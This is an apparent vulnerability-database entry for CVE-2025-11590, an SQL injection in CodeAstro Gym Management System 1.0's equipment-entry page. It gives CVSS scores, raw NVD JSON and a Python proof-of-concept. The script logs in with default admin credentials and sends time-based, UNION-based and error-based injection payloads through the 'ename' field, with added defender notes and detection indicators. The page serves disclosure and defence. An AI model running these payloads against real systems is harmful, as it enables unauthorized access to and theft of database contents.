Security Vulnerability Report
CVE-2025-11590 CVSS 6.3 MEDIUM

CVE-2025-11590

Published: 2025-10-11 01:15:33
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in CodeAstro Gym Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/equipment-entry.php. Manipulating the argument ename can lead to SQL injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
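CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the score and vector shown here are the "Secondary" source's CVSS 3.1 assessment. The raw JSON record below also carries a "Primary" CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and a CVSS 4.0 score of 2.1 LOW, so triage should not rely on the 6.3 figure alone.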

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
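# CVE-2025-11590 - CodeAstro Gym Management System SQL Injection PoC
# Vulnerability: SQL Injection in /admin/equipment-entry.php via 'ename' parameter
# CVSS: 6.3 (MEDIUM)
#
# Reviewer notes (defender view):
# - Weakness class per the CVE record: CWE-89. The 'ename' POST field
#   presumably reaches a SQL statement without parameter binding; the
#   application-side fix is a prepared statement with 'ename' bound as data.
# - Reaching the endpoint needs an authenticated session (PR:L in the CVSS
#   vector), so default or weak admin credentials widen the exposure.
# - Useful log/WAF indicators: POSTs to ADMIN_PATH whose 'ename' contains a
#   quote followed by UNION / SLEEP / INFORMATION_SCHEMA, and response
#   latency that tracks the SLEEP argument.
# - NOTE(review): the login endpoint and the form field names ("username",
#   "password", "submit") are this script's assumptions; nothing on the page
#   confirms them. If login silently fails, the timing check reports "may not
#   be vulnerable" -- that output is not evidence that an instance is patched.
import sys
import time

import requests

# Target configuration
TARGET_URL = "http://target.com"
ADMIN_PATH = "/admin/equipment-entry.php"
USERNAME = "admin"
PASSWORD = "admin123"

# Upper bound (seconds) for every HTTP request. It must stay above the longest
# delay used by the timing check so a delayed response is measured rather than
# cut off; without it an unresponsive host blocks the script indefinitely.
REQUEST_TIMEOUT = 15

# Create a session to maintain cookies
session = requests.Session()


def login(base_url, username, password):
    """Log in to the admin panel so later requests carry a session cookie.

    Args:
        base_url: Scheme and host of the instance under test.
        username: Account name posted as the "username" field.
        password: Password posted as the "password" field.

    Returns:
        The final ``requests.Response`` after redirects. The response is not
        inspected here, so a rejected login is not reported.
    """
    login_url = f"{base_url}/admin/"
    # Attempt login with default or known credentials
    data = {
        "username": username,
        "password": password,
    }
    return session.post(
        login_url, data=data, allow_redirects=True, timeout=REQUEST_TIMEOUT
    )


def exploit_sql_injection(base_url):
    """Post a UNION-based test value in 'ename' and print a response summary.

    Args:
        base_url: Scheme and host of the instance under test.

    Returns:
        The ``requests.Response`` for the request.
    """
    target_url = f"{base_url}{ADMIN_PATH}"

    # SQL Injection payload - UNION based injection to extract database info
    # Adjust column count based on the original query
    payload = "Test' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"

    # The two alternatives below are never sent by this function; they are
    # kept as reference patterns (time-based and error-based), which are also
    # the shapes a detection rule for this endpoint should cover.
    # Alternative time-based blind injection payload
    time_based_payload = "Test' AND SLEEP(5)-- -"
    # Alternative error-based payload
    error_based_payload = "Test' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)-- -"

    data = {
        "ename": payload,
        # Add other required form fields
        "submit": "",
    }
    response = session.post(target_url, data=data, timeout=REQUEST_TIMEOUT)

    if response.status_code == 200:
        print(f"[+] Response length: {len(response.text)}")
        # Check for SQL error messages or data leakage.
        # Weak heuristic: any page containing the word "error" or "sql"
        # matches, so a hit needs manual confirmation.
        body = response.text.lower()
        if "error" in body or "sql" in body:
            print("[+] Possible SQL injection detected!")
            print(response.text[:500])
    return response


def _timed_post(url, data):
    """Return the wall-clock seconds one POST through ``session`` takes."""
    # monotonic() cannot jump backwards on a system clock adjustment, which
    # time.time() can; a jump would corrupt the delay comparison.
    started = time.monotonic()
    session.post(url, data=data, timeout=REQUEST_TIMEOUT)
    return time.monotonic() - started


def check_vulnerability(base_url):
    """Compare the latency of a benign request and a SLEEP(3) request.

    Args:
        base_url: Scheme and host of the instance under test.

    Returns:
        True when the delayed request took more than 2 seconds longer than the
        benign one, otherwise False. Each request is sampled once, so network
        jitter can produce a wrong answer in either direction.
    """
    target_url = f"{base_url}{ADMIN_PATH}"

    # Normal request timing
    normal_data = {"ename": "test_equipment", "submit": ""}
    normal_time = _timed_post(target_url, normal_data)

    # Time-based injection request
    inject_data = {"ename": "test' AND SLEEP(3)-- -", "submit": ""}
    inject_time = _timed_post(target_url, inject_data)

    if inject_time - normal_time > 2:
        print(f"[+] Vulnerability confirmed! Time difference: {inject_time - normal_time:.2f}s")
        return True
    print("[-] Target may not be vulnerable")
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    print(f"[*] Target: {TARGET_URL}")
    try:
        print("[*] Logging in...")
        login(TARGET_URL, USERNAME, PASSWORD)
        print("[*] Checking vulnerability...")
        if check_vulnerability(TARGET_URL):
            print("[*] Exploiting...")
            exploit_sql_injection(TARGET_URL)
    except requests.RequestException as exc:
        # Connection failures and timeouts end the run with a clear message
        # instead of a traceback or an indefinite hang.
        print(f"[-] Request failed: {exc}")
        sys.exit(1)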

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11590", "sourceIdentifier": "[email protected]", "published": "2025-10-11T01:15:32.757", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in CodeAstro Gym Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/equipment-entry.php. Executing a manipulation of the argument ename can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coppeliaz/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327911", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327911", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671738", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coppeliaz/cve/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}